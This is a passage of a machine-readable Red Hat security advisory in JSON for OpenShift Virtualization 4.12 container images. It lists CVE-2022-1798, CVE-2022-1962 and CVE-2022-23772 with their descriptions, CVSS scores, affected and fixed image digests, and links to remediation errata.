"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1798"
},
{
"category": "external",
"summary": "RHBZ#2117872",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1798"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798"
},
{
"category": "external",
"summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm",
"url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"
}
],
"release_date": "2022-08-08T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs"
},
{
"cve": "CVE-2022-1962",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2022-07-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2107376"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the golang standard library, go/parser. When calling any Parse functions on the Go source code, which contains deeply nested types or declarations, a panic can occur due to stack exhaustion. This issue allows an attacker to impact system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: go/parser: stack exhaustion in all Parse* functions",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-1962"
},
{
"category": "external",
"summary": "RHBZ#2107376",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-1962",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1962"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1962",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1962"
},
{
"category": "external",
"summary": "https://go.dev/issue/53616",
"url": "https://go.dev/issue/53616"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: go/parser: stack exhaustion in all Parse* functions"
},
{
"cve": "CVE-2022-23772",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2022-02-11T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2053532"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
